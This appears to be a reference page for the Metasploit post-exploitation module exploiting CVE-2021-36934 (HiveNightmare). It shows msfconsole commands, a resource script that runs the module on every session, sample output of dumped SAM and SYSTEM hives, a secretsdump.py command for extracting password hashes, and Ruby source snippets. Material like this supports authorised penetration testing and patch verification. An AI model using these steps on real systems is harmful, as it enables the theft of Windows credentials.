Windows SAM secrets leak - HiveNightmare - Metasploit
This page contains detailed information about how to use the post/windows/gather/credentials/windows_sam_hivenightmare metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows SAM secrets leak - HiveNightmare
Module: post/windows/gather/credentials/windows_sam_hivenightmare
Source code: modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb
Disclosure date: 2021-07-20
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-36934
This module is also known as HiveNightmare or SeriousSAM.
Due to mismanagement of SAM and SYSTEM hives in Windows 10,
it is possible for an unprivileged user to read those files.
But, as they are locked while Windows is running we are not
able to read them directly. The trick is to take advantage
of Volume Shadow Copy, which is generally enabled, to
finally have a read access. Once SAM and SYSTEM files are
successfully dumped and stored in store_loot
, you can dump
the hashes with some external scripts like secretsdump.py
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/credentials/windows_sam_hivenightmare
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/credentials/windows_sam_hivenightmare
msf post(windows_sam_hivenightmare) > show options
... show and set options ...
msf post(windows_sam_hivenightmare) > set SESSION session-id
msf post(windows_sam_hivenightmare) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/credentials/windows_sam_hivenightmare")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
Description
Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is possible for an unprivileged
user to read those files. But, as they are locked while Windows is running we are not able
to read them directly. The trick is to take advantage of Volume Shadow Copy, which is generally
enabled, to finally have a read access. Once SAM and SYSTEM files are successfully dumped and
stored in store_loot
, you can dump the hashes with some external scripts like secretsdump.py
Installation
VSS is probably already enabled on your Windows 10, if you want to be sure you can follow the steps below:
- Open the control panel
- Navigate to
System and Security > System
- Select
System Protection
from the column on the left - See in
Protection Settings
list if t drive protection is enabled - Optionally, select
Create
to "Create a resptore point right now..."- This is necessary if the module can not find an existing Shadow Copy file which can be the case if the Windows instance is brand new
Be aware that you will need Administrator privileges to follow those steps. You can read more here.
Verification Steps
- Start
msfconsole
use post/windows/gather/credentials/windows_sam_hivenightmare
set ITERATIONS <number>
to specify the number of iterations on file index (default is 10)set FILE_INDEX <number>
optionally if you want to target a specific file index instead of iterating on all indexes in a rangerun
the module to exploit the vulnerability and potentially leak SAM and SYSTEM files
Options
ITERATIONS
Set ITERATIONS to specify the number of iterations on Shadow Copy file index.
Windows is saving those files under the volume name HarddiskVolumeShadowCopy<index>
.
By default, this module is bruteforcing that index
value by trying all values between 0 and 10, which you can change if needed.
FILE_INDEX
Set FILE_INDEX if you want to target a specific index instead of the default behaviour which bruteforces all indexes in a given range.
Scenarios
This module was successfully tested on Windows 10 20H2. See the following output:
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > run
[+] SAM data found in HarddiskVolumeShadowCopy1!
[+] Retrieving files of index 1 as they are the most recently modified...
[+] SAM data saved at /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[+] SYSTEM data saved at /home/smcintyre/.msf4/loot/20210729113926_default_192.168.159.15_windows.system_202176.bin
[+] SAM and SYSTEM data were leaked!
[*] Post module execution completed
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[*] exec: file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
/home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin: MS Windows registry file, NT/2000 or above
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) >
Then, you can dump the hashes from leaked files with secretsdump.py
for instance:
python3 secretsdump.py -sam <SAM_FILE> -system <SYSTEM_FILE> LOCAL
Go back to menu.
Msfconsole Usage
Here is how the windows/gather/credentials/windows_sam_hivenightmare post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/credentials/windows_sam_hivenightmare
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show info
Name: Windows SAM secrets leak - HiveNightmare
Module: post/windows/gather/credentials/windows_sam_hivenightmare
Platform: Windows
Arch:
Rank: Normal
Disclosed: 2021-07-20
Provided by:
Kevin Beaumont
romarroca
Yann Castel (yann.castel <Yann Castel ([email protected])>
Module stability:
crash-safe
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_INDEX no Optional index parameter to retrieve a specific Shadow Copy file
ITERATIONS 10 yes Number of iterations on Shadow Copy file index
SESSION yes The session to run this module on.
Description:
Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is
possible for an unprivileged user to read those files. But, as they
are locked while Windows is running we are not able to read them
directly. The trick is to take advantage of Volume Shadow Copy,
which is generally enabled, to finally have a read access. Once SAM
and SYSTEM files are successfully dumped and stored in `store_loot`,
you can dump the hashes with some external scripts like
secretsdump.py
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-36934
https://github.com/GossiTheDog/HiveNightmare
https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652
https://github.com/romarroca/SeriousSam
Also known as:
HiveNightmare
SeriousSAM
Module Options
This is a complete list of options available in the windows/gather/credentials/windows_sam_hivenightmare post exploitation module:
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show options
Module options (post/windows/gather/credentials/windows_sam_hivenightmare):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_INDEX no Optional index parameter to retrieve a specific Shadow Copy file
ITERATIONS 10 yes Number of iterations on Shadow Copy file index
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/credentials/windows_sam_hivenightmare post exploitation module:
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show advanced
Module advanced options (post/windows/gather/credentials/windows_sam_hivenightmare):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/credentials/windows_sam_hivenightmare module can do:
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/credentials/windows_sam_hivenightmare post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
GetLastError
Here is a relevant code snippet related to the "GetLastError" error message:
46: ])
47: end
48:
49: def check_path(path)
50: r = session.railgun.kernel32.CreateFileA(path, 'GENERIC_READ', 0x3, nil, 'OPEN_EXISTING', 'FILE_ATTRIBUTE_NORMAL', nil)
51: if r['GetLastError'] == 0
52: return r['return']
53: end
54:
55: nil
56: end
Can't open SYSTEM file!
Here is a relevant code snippet related to the "Can't open SYSTEM file!" error message:
77: read_file(sam_handle)
78: )
79: print_good("SAM data saved at #{path}")
80:
81: handle = check_path("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{index}\\Windows\\System32\\config\\SYSTEM")
82: fail_with(Failure::UnexpectedReply, "Can't open SYSTEM file!") unless handle
83: path = store_loot(
84: 'windows.system',
85: '',
86: session,
87: read_file(handle)
Please specify a non-negative file index!
Here is a relevant code snippet related to the "Please specify a non-negative file index!" error message:
90: print_good('SAM and SYSTEM data were leaked!')
91: end
92:
93: def run
94: if datastore['FILE_INDEX']
95: fail_with(Failure::BadConfig, 'Please specify a non-negative file index!') unless datastore['FILE_INDEX'] >= 0
96:
97: handle = check_path("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{datastore['FILE_INDEX']}\\Windows\\System32\\config\\SAM")
98: if handle
99: print_good("SAM data found in HarddiskVolumeShadowCopy#{i}!")
100: print_good("Retrieving files of index #{index_most_recent_shadow_copy}...")
Please specify an iteration number greater than 0!
Here is a relevant code snippet related to the "Please specify an iteration number greater than 0!" error message:
99: print_good("SAM data found in HarddiskVolumeShadowCopy#{i}!")
100: print_good("Retrieving files of index #{index_most_recent_shadow_copy}...")
101: loot_files(handle, datastore['FILE_INDEX'])
102: end
103: else
104: fail_with(Failure::BadConfig, 'Please specify an iteration number greater than 0!') unless datastore['ITERATIONS'] > 0
105:
106: most_recent_time = nil
107: most_recent_shadow_copy = nil
108: index_most_recent_shadow_copy = -1
109:
No Shadow Copy files were found! Maybe you can try again with a greater iteration number...
Here is a relevant code snippet related to the "No Shadow Copy files were found! Maybe you can try again with a greater iteration number..." error message:
127: end
128:
129: if index_most_recent_shadow_copy != -1
130: print_good("Retrieving files of index #{index_most_recent_shadow_copy} as they are the most recently modified...")
131: loot_files(most_recent_shadow_copy, index_most_recent_shadow_copy)
132: else
133: print_error('No Shadow Copy files were found! Maybe you can try again with a greater iteration number...')
134: end
135: end
136: end
137: end
Go back to menu.
Related Pull Requests
- #15536 Merged Pull Request: Fix HiveNightmare Option Reference
- #15462 Merged Pull Request: [CVE-2021-36934] HiveNightmare aka SeriousSam - SAM hashes leak
References
- CVE-2021-36934
- https://github.com/GossiTheDog/HiveNightmare
- https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652
- https://github.com/romarroca/SeriousSam
See Also
Check also the following modules related to this module:
- post/windows/gather/credentials/aim
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/bulletproof_ftp
- post/windows/gather/credentials/chrome
- post/windows/gather/credentials/comodo
- post/windows/gather/credentials/coolnovo
- post/windows/gather/credentials/coreftp
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/digsby
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/credentials/dynazip_log
- post/windows/gather/credentials/dyndns
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/enum_laps
- post/windows/gather/credentials/enum_picasa_pwds
- post/windows/gather/credentials/epo_sql
- post/windows/gather/credentials/filezilla_server
- post/windows/gather/credentials/flashfxp
- post/windows/gather/credentials/flock
- post/windows/gather/credentials/ftpnavigator
- post/windows/gather/credentials/ftpx
- post/windows/gather/credentials/gadugadu
- post/windows/gather/credentials/gpp
- post/windows/gather/credentials/heidisql
- post/windows/gather/credentials/icq
- post/windows/gather/credentials/idm
- post/windows/gather/credentials/ie
- post/windows/gather/credentials/imail
- post/windows/gather/credentials/imvu
- post/windows/gather/credentials/incredimail
- post/windows/gather/credentials/kakaotalk
- post/windows/gather/credentials/kmeleon
- post/windows/gather/credentials/line
- post/windows/gather/credentials/maxthon
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/meebo
- post/windows/gather/credentials/miranda
- post/windows/gather/credentials/moba_xterm
- post/windows/gather/credentials/mremote
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/navicat
- post/windows/gather/credentials/nimbuzz
- post/windows/gather/credentials/opera
- post/windows/gather/credentials/operamail
- post/windows/gather/credentials/outlook
- post/windows/gather/credentials/postbox
- post/windows/gather/credentials/pulse_secure
- post/windows/gather/credentials/purevpn_cred_collector
- post/windows/gather/credentials/qq
- post/windows/gather/credentials/razer_synapse
- post/windows/gather/credentials/razorsql
- post/windows/gather/credentials/rdc_manager_creds
- post/windows/gather/credentials/redis_desktop_manager
- post/windows/gather/credentials/safari
- post/windows/gather/credentials/seamonkey
- post/windows/gather/credentials/securecrt
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/smartermail
- post/windows/gather/credentials/smartftp
- post/windows/gather/credentials/spark_im
- post/windows/gather/credentials/srware
- post/windows/gather/credentials/sso
- post/windows/gather/credentials/steam
- post/windows/gather/credentials/tango
- post/windows/gather/credentials/teamviewer_passwords
- post/windows/gather/credentials/thunderbird
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/credentials/tlen
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/total_commander
- post/windows/gather/credentials/trillian
- post/windows/gather/credentials/viber
- post/windows/gather/credentials/vnc
- post/windows/gather/credentials/windows_autologin
- post/windows/gather/credentials/windowslivemail
- post/windows/gather/credentials/winscp
- post/windows/gather/credentials/wsftp_client
- post/windows/gather/credentials/xchat
- post/windows/gather/credentials/xshell_xftp_password
Authors
- Kevin Beaumont
- romarroca
- Yann Castel (yann.castel[at]orange.com)
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.